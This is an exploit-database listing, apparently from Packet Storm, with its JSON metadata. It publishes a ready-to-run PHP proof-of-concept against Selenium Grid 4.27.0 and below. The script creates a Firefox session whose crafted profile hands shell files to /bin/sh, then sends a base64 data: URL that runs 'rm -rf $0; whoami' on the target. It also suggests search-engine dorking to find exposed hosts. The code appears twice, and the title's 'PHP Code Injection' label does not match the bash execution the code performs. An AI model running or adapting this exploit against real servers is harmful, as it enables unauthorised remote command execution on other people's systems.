📄 Selenium Server (Grid) 4.27.0 Code Injection_PACKETSTORM:215921

Description

Proof of concept exploit for Selenium Server Grid versions 4.27.0 and below that exploits firefoxprofile to force the browser to run bash commands...

Visit Original Source

Basic Information

ID PACKETSTORM:215921

Published Feb 20, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Selenium Server (Grid) versions 4.27.0 and below PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.selenium.dev/blog/2024/selenium-4-27-released/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Sends a request to Selenium Grid to check if the version is vulnerable.

If the target is using Firefox, it exploits firefox_profile to force the browser to run bash commands.

Tries to create a new session, then sends the payload as a command to execute.

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] SeT target = Line : 21

[+] PayLoad :

<?php

function send_request($url, $method = 'GET', $data = null) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);

if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
}

$response = curl_exec($ch);
curl_close($ch);

return json_decode($response, true);
}

$target = "http://target-ip:4444";

$check_url = "$target/status";
$check_response = send_request($check_url);

if (isset($check_response['value']['message']) && strpos($check_response['value']['message'], 'Selenium Grid ready') !== false) {
echo "[+] Selenium Grid detected and it is ready for exploitation!\n";
} else {
die("[-] Selenium Grid was not found or it is not ready.\n");
}

$malicious_profile = [
"defaultHandlersVersion" => ["en-US" => 4],
"mimeTypes" => [
"application/sh" => [
"action" => 2,
"handlers" => [["name" => "sh", "path" => "/bin/sh"]]
]
]
];

$encoded_profile = base64_encode(json_encode($malicious_profile));

$session_data = [
"desiredCapabilities" => [
"browserName" => "firefox",
"firefox_profile" => $encoded_profile
],
"capabilities" => [
"firstMatch" => [
[
"browserName" => "firefox",
"moz:firefoxOptions" => ["profile" => $encoded_profile]
]
]
]
];

$session_url = "$target/wd/hub/session";
$session_response = send_request($session_url, 'POST', $session_data);

if (!isset($session_response['value']['sessionId'])) {
die("[-] Failed to start a new session!\n");
}

$session_id = $session_response['value']['sessionId'];
echo "[+] Session started:: $session_id\n";

$command = "whoami";
$encoded_payload = base64_encode("rm -rf \$0; $command");

$data_url = "data:application/sh;charset=utf-16le;base64,$encoded_payload";
$exploit_url = "$target/wd/hub/session/$session_id/url";

send_request($exploit_url, 'POST', ["url" => $data_url]);

echo "[+] Payload sent! Check if the command was executed.\n";

$delete_url = "$target/wd/hub/session/$session_id";
send_request($delete_url, 'DELETE');

echo "[+] Session deleted.\n";
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-20T16:29:24",
    "description": "Proof of concept exploit for Selenium Server Grid versions 4.27.0 and below that exploits firefoxprofile to force the browser to run bash commands...",
    "published": "2026-02-20T00:00:00",
    "modified": "2026-02-20T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Selenium Server (Grid) 4.27.0 Code Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215921",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Selenium Server (Grid) versions 4.27.0 and below PHP Code Injection Vulnerability                                           |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.selenium.dev/blog/2024/selenium-4-27-released/                                                                  |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Sends a request to Selenium Grid to check if the version is vulnerable.\n    \n        If the target is using Firefox, it exploits firefox_profile to force the browser to run bash commands.\n    \n        Tries to create a new session, then sends the payload as a command to execute.\n     \n    [+] save code as poc.php .\n    \n    [+] USage : cmd => c:\\www\\test\\php poc.php \n    \n    [+] SeT target  = Line : 21\n    \n    [+] PayLoad :\n    \n    <?php\n    \n    function send_request($url, $method = 'GET', $data = null) {\n        $ch = curl_init();\n        curl_setopt($ch, CURLOPT_URL, $url);\n        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);\n    \n        if ($data) {\n            curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));\n            curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);\n        }\n    \n        $response = curl_exec($ch);\n        curl_close($ch);\n    \n        return json_decode($response, true);\n    }\n    \n    $target = \"http://target-ip:4444\"; \n    \n    $check_url = \"$target/status\";\n    $check_response = send_request($check_url);\n    \n    if (isset($check_response['value']['message']) && strpos($check_response['value']['message'], 'Selenium Grid ready') !== false) {\n        echo \"[+] Selenium Grid detected and it is ready for exploitation!\\n\";\n    } else {\n        die(\"[-] Selenium Grid was not found or it is not ready.\\n\");\n    }\n    \n    $malicious_profile = [\n        \"defaultHandlersVersion\" => [\"en-US\" => 4],\n        \"mimeTypes\" => [\n            \"application/sh\" => [\n                \"action\" => 2,\n                \"handlers\" => [[\"name\" => \"sh\", \"path\" => \"/bin/sh\"]]\n            ]\n        ]\n    ];\n    \n    $encoded_profile = base64_encode(json_encode($malicious_profile));\n    \n    $session_data = [\n        \"desiredCapabilities\" => [\n            \"browserName\" => \"firefox\",\n            \"firefox_profile\" => $encoded_profile\n        ],\n        \"capabilities\" => [\n            \"firstMatch\" => [\n                [\n                    \"browserName\" => \"firefox\",\n                    \"moz:firefoxOptions\" => [\"profile\" => $encoded_profile]\n                ]\n            ]\n        ]\n    ];\n    \n    $session_url = \"$target/wd/hub/session\";\n    $session_response = send_request($session_url, 'POST', $session_data);\n    \n    if (!isset($session_response['value']['sessionId'])) {\n        die(\"[-] Failed to start a new session!\\n\");\n    }\n    \n    $session_id = $session_response['value']['sessionId'];\n    echo \"[+] Session started:: $session_id\\n\";\n    \n    $command = \"whoami\"; \n    $encoded_payload = base64_encode(\"rm -rf \\$0; $command\");\n    \n    $data_url = \"data:application/sh;charset=utf-16le;base64,$encoded_payload\";\n    $exploit_url = \"$target/wd/hub/session/$session_id/url\";\n    \n    send_request($exploit_url, 'POST', [\"url\" => $data_url]);\n    \n    echo \"[+] Payload sent! Check if the command was executed.\\n\";\n    \n    $delete_url = \"$target/wd/hub/session/$session_id\";\n    send_request($delete_url, 'DELETE');\n    \n    echo \"[+] Session deleted.\\n\";\n    ?>\n    \n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215921",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215921/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply